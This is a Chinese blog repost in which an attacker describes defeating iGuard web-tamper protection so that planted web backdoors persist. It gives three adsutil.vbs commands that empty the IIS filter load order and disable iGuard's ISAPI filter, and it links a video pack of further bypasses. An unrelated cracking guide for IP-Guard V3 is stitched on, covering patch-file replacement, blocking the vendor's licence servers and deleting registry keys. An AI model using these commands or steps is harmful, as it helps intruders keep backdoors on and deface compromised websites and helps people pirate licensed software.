8种方法突破iGuard网页防篡改软件保护

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

                前段时间在搞一个受到网页防篡改保护的网站,之前不知道有这东西,后来在植入web后门的时候,老是被删掉,郁闷...
    困扰了整整一天后,在翻看C盘时,发现根目录下一个奇怪的文件夹"Tercel",找了几个文件研究,才知道这里有一个叫iGuard的网页防篡改...汗死..不懂这东西,立即google恶补下,找到官网,居然不提供下载,囧~~
    不过,根据我的经验,不提供下载的软件基本上都会有一堆毛病,哈哈...
    之后通过社工骗取了一套试用版,接下来的2天里,通过在虚拟机中反复测试,终于把这东西的原理摸熟了,并找到8种办法 突破iGuard的保护,其中有几种不用管理员权限就能突破.2天的成果,分享出来让后来者少走弯路,以后再遇到这种系统保护的网站要绕过它就轻车熟路了.
    这里先简单说下iGuard的原理,这东西会在 IIS/ Apache中安插一个ISAPI过滤器(ISAPI Filter)/Apache模块,这个模块对你请求的每一个网页都计算一下它的MD5值,然后跟自己MD5库中记录的进行比较,如果一致就说明没有篡改,放行通过,如果不一致,就拦截,并立即恢复网页(这也是为什么之前我在网页中插入后门,然后访问后门,就会立即被删除的原因).
    OK,知己知彼,百战不殆,在理解了它的原理后,要对付它就容易多了,何况这个iGuard设计上就有众多安全隐患.
    因为突破方法比较多,所以我打包成一个rar(视频+文字解说).
    邪8这里上传15MB的附件老是出错,郁闷,没法子,只好放过地方了,下载地址:
    http://www.vdisk.cn/user/admin/tempuser1377003355

    如果比较懒,不想看详细视频演示资料,可以直接用下面的这个方法让iGuard失效:

    原理:因为iGuard 数字水印检测功能的实现,完全依赖于一个 ISAPI 筛选器模块,只要把这个筛选器删除,就可以让篡改网页随意留出了...不管这个iGuard是不是双机部署,不管采取什么水印,立刻统统失效.

    操作:用下面三条cmd命令,就可以把iGuard的 ISAPI 筛选器模块删掉.
复制内容到剪贴板
代码:
//cmd 查找 iGuard 的 ISAPI 筛选器模块,同时获取网站ID...
cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs enum_all w3svc /p | find "iguard" /i

//cmd 获取指定网站的 FilterLoadOrder 序列...
cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs get w3svc/xxx/filters/FilterLoadOrder

//cmd 设置新的 FilterLoadOrder 序列到指定网站...
cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set w3svc/xxx/filters/FilterLoadOrder ""
删除iGuard的 ISAPI 筛选器模块后,咱们就可以随意修改网页了,hoho~~           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow
这里写图片描述
IP-Guard V3 暴力破解版 软件就不多介绍了,相信很多人在找但是都没有找到破解版,有些人虽然手里有,但要卖人民币,刚好自己也在学习破解,就拿了这个软件做为学习对象,因个人能力有限,破解技术有待提高,没有办法找出注册码,只找到了序列号,现在只放出暴力破解版,等破解技术提高了,有能力找出注册算法,再做注册机。 软件使用: 1、首先安装SQL 2000或以上专业版,注意不要用免费版本; 2、下载本软件最新安装程序,下载链接:http://www.tec-development.com/down/ipguard/V3/IPguard3.11.0720.zip; 3、安装好后,先停止OServer3服务,用补丁文件替换安装目录下的同名文件; 4、启动服务,稍等片刻,再打开软件注册对话框输入序列号; 5、在路由器或火墙上屏蔽如下IP和网址,虽然破解补丁对软件连网验证部分做了处理,但不排除还有其它验证部分,最好做下屏蔽: IP:58.177.209.130;58.177.209.134;210.51.188.215;218.16.120.134 网址:www.register-center.com;www.ip-guard.com;www.ip-guard.net;www.gzmcrown.com;www.tec-development.com;www.safenet.net.cn;www.myprice.com.cn 6、如果软件偷偷连网验证,导致破解失效,可按如下办法重新注册: 1)停止OServer3服务,方法:右击任务栏的“服务控制器”,选择“停止服务” 2)打开注册表:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{578D04C7-7C7D-448A-AF4A-065606069E85},将“{578D04C7-7C7D-448A-AF4A-065606069E85}”主键删除; 3)打开注册表:HKEY_LOCAL_MACHINE\SOFTWARE\TEC\OCULAR.3\SERVER,将“SERVER”主键删除; 4)打开注册表:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG,将“RNG”主键删除; 5)打开系统盘Windows目录下的win.ini文件,将“[OSERVER3]”及以下内容全部删除,删除前先备份; 6)重新启动OServer3服务,方法:右击任务栏的“服务控制器”,选择“启动服务” 7)重新注册输入相应客户端序列号。 注意:注册表操作不当可能引起系统错误,请谨慎操作,勿删错键值,为防止意外,建议删除前先导出键值。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值